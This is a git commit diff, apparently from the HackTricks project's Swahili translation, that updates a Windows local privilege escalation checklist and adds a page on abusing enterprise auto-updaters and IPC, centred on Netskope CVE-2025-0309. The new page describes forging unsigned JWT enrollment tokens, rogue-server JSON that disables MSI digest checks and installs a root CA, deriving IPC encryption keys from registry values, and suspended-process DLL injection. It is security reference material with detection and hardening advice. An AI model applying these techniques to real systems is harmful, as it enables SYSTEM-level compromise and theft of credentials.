Translated ['src/windows-hardening/checklist-windows-privilege-escalatio

2025-10-10 18:36:50 +00:00 · 2025-09-03 14:53:50 +00:00 · 2025-09-03 14:53:50 +00:00 · 84a66522fe
commit 84a66522fe
parent 4d35424d1d
4 changed files with 542 additions and 423 deletions
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@ -236,6 +236,7 @@
 - [Authentication Credentials Uac And Efs](windows-hardening/authentication-credentials-uac-and-efs.md)
 - [Checklist - Local Windows Privilege Escalation](windows-hardening/checklist-windows-privilege-escalation.md)
 - [Windows Local Privilege Escalation](windows-hardening/windows-local-privilege-escalation/README.md)
+  - [Abusing Auto Updaters And Ipc](windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
  - [Arbitrary Kernel Rw Token Theft](windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md)
  - [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md)
  - [Abusing Tokens](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md)
--- a/src/windows-hardening/checklist-windows-privilege-escalation.md
+++ b/src/windows-hardening/checklist-windows-privilege-escalation.md
@ -1,114 +1,115 @@
-# Orodha - Kuinua Haki za Windows za Mitaa
+# Orodha ya ukaguzi - Local Windows Privilege Escalation

 {{#include ../banners/hacktricks-training.md}}

-### **Zana bora ya kutafuta njia za kuinua haki za Windows za ndani:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
+### **Zana bora ya kutafuta Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)

-### [Taarifa za Mfumo](windows-local-privilege-escalation/index.html#system-info)
+### [System Info](windows-local-privilege-escalation/index.html#system-info)

- [ ] Pata [**Taarifa za mfumo**](windows-local-privilege-escalation/index.html#system-info)
- [ ] Tafuta **kernel** [**exploits kwa kutumia scripts**](windows-local-privilege-escalation/index.html#version-exploits)
- [ ] Tumia **Google kutafuta** **exploits** za kernel
- [ ] Tumia **searchsploit kutafuta** **exploits** za kernel
- [ ] Taarifa za kuvutia katika [**env vars**](windows-local-privilege-escalation/index.html#environment)?
- [ ] Nywila katika [**PowerShell history**](windows-local-privilege-escalation/index.html#powershell-history)?
+- [ ] Pata [**System information**](windows-local-privilege-escalation/index.html#system-info)
+- [ ] Tafuta **kernel** [**exploits using scripts**](windows-local-privilege-escalation/index.html#version-exploits)
+- [ ] Tumia **Google to search** for kernel **exploits**
+- [ ] Tumia **searchsploit to search** for kernel **exploits**
+- [ ] Kuna taarifa ya kuvutia katika [**env vars**](windows-local-privilege-escalation/index.html#environment)?
+- [ ] Manenosiri katika [**PowerShell history**](windows-local-privilege-escalation/index.html#powershell-history)?
 - [ ] Taarifa za kuvutia katika [**Internet settings**](windows-local-privilege-escalation/index.html#internet-settings)?
 - [ ] [**Drives**](windows-local-privilege-escalation/index.html#drives)?
 - [ ] [**WSUS exploit**](windows-local-privilege-escalation/index.html#wsus)?
+- [ ] [**Third-party agent auto-updaters / IPC abuse**](windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
 - [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/index.html#alwaysinstallelevated)?

-### [Kuhesabu/AV enumeration](windows-local-privilege-escalation/index.html#enumeration)
+### [Logging/AV enumeration](windows-local-privilege-escalation/index.html#enumeration)

- [ ] Angalia [**Audit** ](windows-local-privilege-escalation/index.html#audit-settings)na [**WEF** ](windows-local-privilege-escalation/index.html#wef)settings
+- [ ] Angalia [**Audit** ](windows-local-privilege-escalation/index.html#audit-settings) na [**WEF** ](windows-local-privilege-escalation/index.html#wef) mipangilio
 - [ ] Angalia [**LAPS**](windows-local-privilege-escalation/index.html#laps)
- [ ] Angalia kama [**WDigest** ](windows-local-privilege-escalation/index.html#wdigest)iko hai
+- [ ] Angalia ikiwa [**WDigest** ](windows-local-privilege-escalation/index.html#wdigest) inafanya kazi
 - [ ] [**LSA Protection**](windows-local-privilege-escalation/index.html#lsa-protection)?
 - [ ] [**Credentials Guard**](windows-local-privilege-escalation/index.html#credentials-guard)[?](windows-local-privilege-escalation/index.html#cached-credentials)
 - [ ] [**Cached Credentials**](windows-local-privilege-escalation/index.html#cached-credentials)?
- [ ] Angalia kama kuna [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md)
+- [ ] Angalia ikiwa kuna [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md)
 - [ ] [**AppLocker Policy**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)?
 - [ ] [**UAC**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control/README.md)
 - [ ] [**User Privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
- [ ] Angalia [**haki za**] **mtumiaji wa sasa** (windows-local-privilege-escalation/index.html#users-and-groups)
- [ ] Je, wewe ni [**mwanachama wa kikundi chochote chenye haki**](windows-local-privilege-escalation/index.html#privileged-groups)?
- [ ] Angalia kama una [mifumo hii ya tokens iliyoanzishwa](windows-local-privilege-escalation/index.html#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
- [ ] [**Sessions za Watumiaji**](windows-local-privilege-escalation/index.html#logged-users-sessions)?
- [ ] Angalia [**nyumba za watumiaji**](windows-local-privilege-escalation/index.html#home-folders) (ufikiaji?)
- [ ] Angalia [**Sera ya Nywila**](windows-local-privilege-escalation/index.html#password-policy)
- [ ] Nini kiko [**ndani ya Clipboard**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard)?
+- [ ] Angalia [**current** user **privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
+- [ ] Je, wewe ni [**member of any privileged group**](windows-local-privilege-escalation/index.html#privileged-groups)?
+- [ ] Angalia ikiwa una [any of these tokens enabled](windows-local-privilege-escalation/index.html#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
+- [ ] [**Users Sessions**](windows-local-privilege-escalation/index.html#logged-users-sessions)?
+- [ ] Angalia[ **users homes**](windows-local-privilege-escalation/index.html#home-folders) (ufikia?)
+- [ ] Angalia [**Password Policy**](windows-local-privilege-escalation/index.html#password-policy)
+- [ ] Nini kimepo[ **inside the Clipboard**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard)?

-### [Mtandao](windows-local-privilege-escalation/index.html#network)
+### [Network](windows-local-privilege-escalation/index.html#network)

- [ ] Angalia **taarifa za sasa za** [**mtandao**](windows-local-privilege-escalation/index.html#network)
- [ ] Angalia **huduma za ndani zilizofichwa** zilizozuiliwa kwa nje
+- [ ] Angalia **current** [**network** **information**](windows-local-privilege-escalation/index.html#network)
+- [ ] Angalia **hidden local services** zinazopatikana kutoka nje

-### [Mchakato unaoendelea](windows-local-privilege-escalation/index.html#running-processes)
+### [Running Processes](windows-local-privilege-escalation/index.html#running-processes)

- [ ] Mchakato wa binaries [**file na ruhusa za folda**](windows-local-privilege-escalation/index.html#file-and-folder-permissions)
- [ ] [**Kuchimba nywila za kumbukumbu**](windows-local-privilege-escalation/index.html#memory-password-mining)
- [ ] [**Programu za GUI zisizo salama**](windows-local-privilege-escalation/index.html#insecure-gui-apps)
- [ ] Pora nywila na **michakato ya kuvutia** kupitia `ProcDump.exe` ? (firefox, chrome, nk ...)
+- [ ] Processes binaries [**file and folders permissions**](windows-local-privilege-escalation/index.html#file-and-folder-permissions)
+- [ ] [**Memory Password mining**](windows-local-privilege-escalation/index.html#memory-password-mining)
+- [ ] [**Insecure GUI apps**](windows-local-privilege-escalation/index.html#insecure-gui-apps)
+- [ ] Pora credentials kwa **interesting processes** kwa kutumia `ProcDump.exe` ? (firefox, chrome, etc ...)

-### [Huduma](windows-local-privilege-escalation/index.html#services)
+### [Services](windows-local-privilege-escalation/index.html#services)

- [ ] [Je, unaweza **kubadilisha huduma yoyote**?](windows-local-privilege-escalation/index.html#permissions)
- [ ] [Je, unaweza **kubadilisha** **binary** inayotekelezwa na **huduma yoyote**?](windows-local-privilege-escalation/index.html#modify-service-binary-path)
- [ ] [Je, unaweza **kubadilisha** **registry** ya **huduma yoyote**?](windows-local-privilege-escalation/index.html#services-registry-modify-permissions)
- [ ] [Je, unaweza kunufaika na **path** ya **binary** ya **huduma isiyo na quote**?](windows-local-privilege-escalation/index.html#unquoted-service-paths)
+- [ ] [Can you **modify any service**?](windows-local-privilege-escalation/index.html#permissions)
+- [ ] [Can you **modify** the **binary** that is **executed** by any **service**?](windows-local-privilege-escalation/index.html#modify-service-binary-path)
+- [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/index.html#services-registry-modify-permissions)
+- [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/index.html#unquoted-service-paths)

-### [**Programu**](windows-local-privilege-escalation/index.html#applications)
+### [**Applications**](windows-local-privilege-escalation/index.html#applications)

- [ ] **Andika** [**ruhusa kwenye programu zilizowekwa**](windows-local-privilege-escalation/index.html#write-permissions)
- [ ] [**Programu za Kuanzisha**](windows-local-privilege-escalation/index.html#run-at-startup)
- [ ] **Wasiwasi** [**Madereva**](windows-local-privilege-escalation/index.html#drivers)
+- [ ] **Write** [**permissions on installed applications**](windows-local-privilege-escalation/index.html#write-permissions)
+- [ ] [**Startup Applications**](windows-local-privilege-escalation/index.html#run-at-startup)
+- [ ] **Vulnerable** [**Drivers**](windows-local-privilege-escalation/index.html#drivers)

 ### [DLL Hijacking](windows-local-privilege-escalation/index.html#path-dll-hijacking)

- [ ] Je, unaweza **kuandika katika folda yoyote ndani ya PATH**?
- [ ] Je, kuna binary ya huduma inayojulikana ambayo **inajaribu kupakia DLL isiyokuwepo**?
- [ ] Je, unaweza **kuandika** katika **folda za binaries**?
+- [ ] Je, unaweza **write in any folder inside PATH**?
+- [ ] Je, kuna binary ya huduma inayojulikana ambayo **tries to load any non-existant DLL**?
+- [ ] Je, unaweza **write** in any **binaries folder**?

-### [Mtandao](windows-local-privilege-escalation/index.html#network)
+### [Network](windows-local-privilege-escalation/index.html#network)

- [ ] Hesabu mtandao (shares, interfaces, routes, neighbours, ...)
- [ ] Angalia kwa makini huduma za mtandao zinazokisikiliza kwenye localhost (127.0.0.1)
+- [ ] Orodhesha mtandao (shares, interfaces, routes, neighbours, ...)
+- [ ] Angalia kwa makini network services listening on localhost (127.0.0.1)

-### [Nywila za Windows](windows-local-privilege-escalation/index.html#windows-credentials)
+### [Windows Credentials](windows-local-privilege-escalation/index.html#windows-credentials)

- [ ] [**Winlogon** ](windows-local-privilege-escalation/index.html#winlogon-credentials)nywila
- [ ] [**Windows Vault**](windows-local-privilege-escalation/index.html#credentials-manager-windows-vault) nywila ambazo unaweza kutumia?
- [ ] Taarifa za kuvutia [**DPAPI credentials**](windows-local-privilege-escalation/index.html#dpapi)?
- [ ] Nywila za mitandao ya [**Wifi zilizohifadhiwa**](windows-local-privilege-escalation/index.html#wifi)?
- [ ] Taarifa za kuvutia katika [**RDP Connections zilizohifadhiwa**](windows-local-privilege-escalation/index.html#saved-rdp-connections)?
- [ ] Nywila katika [**amri zilizokimbizwa hivi karibuni**](windows-local-privilege-escalation/index.html#recently-run-commands)?
- [ ] [**Meneja wa Nywila za Desktop ya KijRemote**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) nywila?
- [ ] [**AppCmd.exe** ipo](windows-local-privilege-escalation/index.html#appcmd-exe)? Nywila?
+- [ ] [**Winlogon** ](windows-local-privilege-escalation/index.html#winlogon-credentials)credentials
+- [ ] [**Windows Vault**](windows-local-privilege-escalation/index.html#credentials-manager-windows-vault) credentials ambazo unaweza kutumia?
+- [ ] Taarifa za kuvutia katika [**DPAPI credentials**](windows-local-privilege-escalation/index.html#dpapi)?
+- [ ] Manenosiri za mitandao zilizohifadhiwa za [**Wifi networks**](windows-local-privilege-escalation/index.html#wifi)?
+- [ ] Taarifa za kuvutia katika [**saved RDP Connections**](windows-local-privilege-escalation/index.html#saved-rdp-connections)?
+- [ ] Manenosiri katika [**recently run commands**](windows-local-privilege-escalation/index.html#recently-run-commands)?
+- [ ] [**Remote Desktop Credentials Manager**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) manenosiri?
+- [ ] [**AppCmd.exe** exists](windows-local-privilege-escalation/index.html#appcmd-exe)? Credentials?
 - [ ] [**SCClient.exe**](windows-local-privilege-escalation/index.html#scclient-sccm)? DLL Side Loading?

-### [Faili na Registry (Nywila)](windows-local-privilege-escalation/index.html#files-and-registry-credentials)
+### [Files and Registry (Credentials)](windows-local-privilege-escalation/index.html#files-and-registry-credentials)

- [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/index.html#putty-creds) **na** [**SSH host keys**](windows-local-privilege-escalation/index.html#putty-ssh-host-keys)
- [ ] [**SSH keys katika registry**](windows-local-privilege-escalation/index.html#ssh-keys-in-registry)?
- [ ] Nywila katika [**faili zisizokuwa na mtu**](windows-local-privilege-escalation/index.html#unattended-files)?
- [ ] Backup yoyote ya [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups)?
+- [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/index.html#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/index.html#putty-ssh-host-keys)
+- [ ] [**SSH keys in registry**](windows-local-privilege-escalation/index.html#ssh-keys-in-registry)?
+- [ ] Manenosiri katika [**unattended files**](windows-local-privilege-escalation/index.html#unattended-files)?
+- [ ] Any [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups) backup?
 - [ ] [**Cloud credentials**](windows-local-privilege-escalation/index.html#cloud-credentials)?
- [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/index.html#mcafee-sitelist.xml) faili?
+- [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/index.html#mcafee-sitelist.xml) file?
 - [ ] [**Cached GPP Password**](windows-local-privilege-escalation/index.html#cached-gpp-pasword)?
- [ ] Nywila katika [**IIS Web config file**](windows-local-privilege-escalation/index.html#iis-web-config)?
+- [ ] Nenosiri katika [**IIS Web config file**](windows-local-privilege-escalation/index.html#iis-web-config)?
 - [ ] Taarifa za kuvutia katika [**web** **logs**](windows-local-privilege-escalation/index.html#logs)?
- [ ] Je, unataka [**kuomba nywila**](windows-local-privilege-escalation/index.html#ask-for-credentials) kwa mtumiaji?
- [ ] Taarifa za kuvutia [**ndani ya Recycle Bin**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin)?
- [ ] Registry nyingine [**ikiwemo nywila**](windows-local-privilege-escalation/index.html#inside-the-registry)?
- [ ] Ndani ya [**data za kivinjari**](windows-local-privilege-escalation/index.html#browsers-history) (dbs, historia, alama, ...)?
- [ ] [**Utafutaji wa nywila wa jumla**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry) katika faili na registry
- [ ] [**Zana**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords) za kutafuta nywila kiotomatiki
+- [ ] Unataka [**ask for credentials**](windows-local-privilege-escalation/index.html#ask-for-credentials) kwa mtumiaji?
+- [ ] Taarifa za kuvutia katika [**files inside the Recycle Bin**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin)?
+- [ ] Mengine [**registry containing credentials**](windows-local-privilege-escalation/index.html#inside-the-registry)?
+- [ ] Ndani ya [**Browser data**](windows-local-privilege-escalation/index.html#browsers-history) (dbs, history, bookmarks, ...)?
+- [ ] [**Generic password search**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry) katika faili na registry
+- [ ] [**Tools**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords) to automatically search for passwords

 ### [Leaked Handlers](windows-local-privilege-escalation/index.html#leaked-handlers)

- [ ] Je, una ufikiaji wa handler yoyote ya mchakato unaoendeshwa na msimamizi?
+- [ ] Je, una ufikiaji wa handler yoyote ya mchakato unaoendeshwa na administrator?

 ### [Pipe Client Impersonation](windows-local-privilege-escalation/index.html#named-pipe-client-impersonation)

- [ ] Angalia kama unaweza kuitumia
+- [ ] Angalia ikiwa unaweza kuitumia vibaya

 {{#include ../banners/hacktricks-training.md}}
--- a/src/windows-hardening/windows-local-privilege-escalation/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/README.md
--- a/src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md
@ -0,0 +1,123 @@
+# Kutumiwa Vibaya kwa Auto-Updaters za Shirika na IPC zilizo na Vibali (e.g., Netskope stAgentSvc)
+
+{{#include ../../banners/hacktricks-training.md}}
+
+Ukurasa huu unazungumzia darasa la Windows local privilege escalation chains zinazopatikana katika endpoint agents na updaters za shirika ambazo zinaonyesha uso wa IPC wa low‑friction na mtiririko wa update wenye vibali. Mfano unaowakilisha ni Netskope Client for Windows < R129 (CVE-2025-0309), ambapo mtumiaji mwenye vibali vya chini anaweza kulazimishwa kujiunga na server inayodhibitiwa na mshambuliaji kisha kuwasilisha MSI ya uharibifu ambayo service ya SYSTEM inaisakinisha.
+
+Mawazo muhimu unayoweza kutumia dhidi ya bidhaa zinazofanana:
+- Abuse a privileged service’s localhost IPC to force re‑enrollment or reconfiguration to an attacker server.
+- Implement the vendor’s update endpoints, deliver a rogue Trusted Root CA, and point the updater to a malicious, “signed” package.
+- Evade weak signer checks (CN allow‑lists), optional digest flags, and lax MSI properties.
+- If IPC is “encrypted”, derive the key/IV from world‑readable machine identifiers stored in the registry.
+- If the service restricts callers by image path/process name, inject into an allow‑listed process or spawn one suspended and bootstrap your DLL via a minimal thread‑context patch.
+
+---
+## 1) Forcing enrollment to an attacker server via localhost IPC
+
+Wakala wengi hutoa mchakato wa user‑mode UI ambao unazungumza na service ya SYSTEM juu ya localhost TCP kwa kutumia JSON.
+
+Imeonekana katika Netskope:
+- UI: stAgentUI (low integrity) ↔ Service: stAgentSvc (SYSTEM)
+- IPC command ID 148: IDP_USER_PROVISIONING_WITH_TOKEN
+
+Exploit flow:
+1) Craft a JWT enrollment token whose claims control the backend host (e.g., AddonUrl). Use alg=None so no signature is required.
+2) Send the IPC message invoking the provisioning command with your JWT and tenant name:
+```json
+{
+"148": {
+"idpTokenValue": "<JWT with AddonUrl=attacker-host; header alg=None>",
+"tenantName": "TestOrg"
+}
+}
+```
+3) Service inaanza kuwasiliana na rogue server yako kwa ajili ya enrollment/config, kwa mfano:
+- /v1/externalhost?service=enrollment
+- /config/user/getbrandingbyemail
+
+Vidokezo:
+- Ikiwa uthibitishaji wa mtumaji unategemea njia/jina, tuma ombi kutoka kwa vendor binary iliyoorodheshwa kwenye orodha ya kuruhusiwa (angalia §4).
+
+---
+## 2) Hijacking the update channel to run code as SYSTEM
+
+Mara client inapozungumza na server yako, tekeleza endpoints zinazotarajiwa na ielekeze kwa attacker MSI. Mfuatano wa kawaida:
+
+1) /v2/config/org/clientconfig → Rudisha JSON config yenye kipindi kifupi sana cha updater, kwa mfano:
+```json
+{
+"clientUpdate": { "updateIntervalInMin": 1 },
+"check_msi_digest": false
+}
+```
+2) /config/ca/cert → Rudisha cheti cha CA katika fomati PEM. Huduma inakisakinisha katika Local Machine Trusted Root store.
+3) /v2/checkupdate → Weka metadata inayorejelea MSI haribifu na toleo bandia.
+
+Bypassing common checks seen in the wild:
+- Signer CN allow‑list: huduma inaweza tu kuangalia Subject CN ni “netSkope Inc” au “Netskope, Inc.”. CA yako ya uhalifu inaweza kutoa leaf yenye CN hiyo na kusaini MSI.
+- CERT_DIGEST property: jumuisha mali ya MSI isiyoharibu yenye jina CERT_DIGEST. Hakuna utekelezaji wa lazima wakati wa usakinishaji.
+- Optional digest enforcement: config flag (e.g., check_msi_digest=false) inazima uthibitishaji wa ziada wa kriptografia.
+
+Matokeo: service ya SYSTEM inakisakinisha MSI yako kutoka
+C:\ProgramData\Netskope\stAgent\data\*.msi
+ikitekeleza nambari yoyote kama NT AUTHORITY\SYSTEM.
+
+---
+## 3) Forging encrypted IPC requests (when present)
+
+Kutoka R127, Netskope ilifunika IPC JSON katika uwanja encryptData unaoonekana kama Base64. Reversing ilionyesha AES yenye key/IV zinazotokana na thamani za registry zinazoweza kusomwa na mtumiaji yeyote:
+- Key = HKLM\SOFTWARE\NetSkope\Provisioning\nsdeviceidnew
+- IV  = HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductID
+
+Wavamizi wanaweza kuiga encryption na kutuma amri za IPC zenye encryption halali kutoka kwa mtumiaji wa kawaida. Ushauri wa jumla: ikiwa agent kwa ghafla “inaficha” IPC yake, tazama device IDs, product GUIDs, install IDs chini ya HKLM kama nyenzo za encryption.
+
+---
+## 4) Bypassing IPC caller allow‑lists (path/name checks)
+
+Huduma zingine hujaribu kuthibitisha peer kwa kutatua PID ya muunganisho wa TCP na kulinganisha image path/name dhidi ya binaries zilizoorodheshwa za vendor chini ya Program Files (mfano stagentui.exe, bwansvc.exe, epdlp.exe).
+
+Njia mbili za vitendo:
+- DLL injection ndani ya process iliyo kwenye allow‑list (mfano nsdiag.exe) na kushika/proxy IPC kutoka ndani yake.
+- Piga kengele binary iliyoorodheshwa ikifufuliwa kwa hali ya suspended na kuanzisha DLL yako ya proxy bila CreateRemoteThread (see §5) ili kutosheleza sheria zilizotekelezwa na driver kuzuia tampering.
+
+---
+## 5) Tamper‑protection friendly injection: suspended process + NtContinue patch
+
+Products mara nyingi huja na minifilter/OB callbacks driver (mfano Stadrv) inayokata haki hatari kutoka kwa handles za processes zilizo na ulinzi:
+- Process: inatoa mazingira kama PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_READ, PROCESS_DUP_HANDLE, PROCESS_SUSPEND_RESUME
+- Thread: inazuia hadi THREAD_GET_CONTEXT, THREAD_QUERY_LIMITED_INFORMATION, THREAD_RESUME, SYNCHRONIZE
+
+Loader ya user‑mode inayotegemewa na kuheshimu vikwazo hivi:
+1) CreateProcess ya vendor binary na CREATE_SUSPENDED.
+2) Pata handles ambazo bado unaruhusiwa: PROCESS_VM_WRITE | PROCESS_VM_OPERATION kwa process, na thread handle yenye THREAD_GET_CONTEXT/THREAD_SET_CONTEXT (au tu THREAD_RESUME ikiwa unatayarisha code kwenye RIP inayojulikana).
+3) Andika juu ya ntdll!NtContinue (au thunk nyingine ya mapema, iliyoorodheshwa kwa hakika) kwa stub ndogo inayopiga LoadLibraryW kwenye path ya DLL yako, kisha kuruka kurudi.
+4) ResumeThread ili kuamsha stub yako ndani ya process, ikipakia DLL yako.
+
+Kwa sababu haukutumia PROCESS_CREATE_THREAD au PROCESS_SUSPEND_RESUME kwenye process iliyokuwa tayari na ulinzi (uliiunda wewe), sera ya driver inatimizwa.
+
+---
+## 6) Practical tooling
+- NachoVPN (Netskope plugin) inaendesha otomatiki rogue CA, kusaini MSI haribifu, na kutumika kupeana endpoints zinazohitajika: /v2/config/org/clientconfig, /config/ca/cert, /v2/checkupdate.
+- UpSkope ni custom IPC client inayotengeneza ujumbe wowote wa IPC (hiari kwa AES‑encryption) na inajumuisha suspended‑process injection ili asili iwe kutoka kwa binary iliyoorodheshwa.
+
+---
+## 7) Detection opportunities (blue team)
+- Simamia uongezaji wa Local Machine Trusted Root. Sysmon + registry‑mod eventing (see SpecterOps guidance) hufanya kazi vizuri.
+- Tambua utekelezaji wa MSI ulioanzishwa na service ya agent kutoka paths kama C:\ProgramData\<vendor>\<agent>\data\*.msi.
+- Angalia logs za agent kwa hosts/tenants zisizotarajiwa za enrollment, kwa mfano: C:\ProgramData\netskope\stagent\logs\nsdebuglog.log – tafuta addonUrl / tenant anomalies na provisioning msg 148.
+- Toa alarm juu ya localhost IPC clients ambao si binaries zilizotarajiwa kusainiwa, au wanaotokana na miti ya child process isiyo ya kawaida.
+
+---
+## Hardening tips for vendors
+- Gana enrollment/update hosts kwa allow‑list kali; kataa domains zisizo salama katika clientcode.
+- Thibitisha IPC peers kwa primitives za OS (ALPC security, named‑pipe SIDs) badala ya ukaguzi wa image path/name.
+- Weka nyenzo za siri nje ya HKLM zinazosomeka kwa wote; ikiwa IPC lazima iwe encrypted, zaa keys kutoka kwa siri zilizo na ulinzi au zigadilishe juu ya channels zilizo thibitishwa.
+- Tendea updater kama uso wa supply‑chain: hitaji mnyororo kamili hadi CA uamiliki, thibitisha signatures za package dhidi ya pinned keys, na fail closed ikiwa validation imezimwa katika config.
+
+## References
+- [Advisory – Netskope Client for Windows – Local Privilege Escalation via Rogue Server (CVE-2025-0309)](https://blog.amberwolf.com/blog/2025/august/advisory---netskope-client-for-windows---local-privilege-escalation-via-rogue-server/)
+- [NachoVPN – Netskope plugin](https://github.com/AmberWolfCyber/NachoVPN)
+- [UpSkope – Netskope IPC client/exploit](https://github.com/AmberWolfCyber/UpSkope)
+- [NVD – CVE-2025-0309](https://nvd.nist.gov/vuln/detail/CVE-2025-0309)
+
+{{#include ../../banners/hacktricks-training.md}}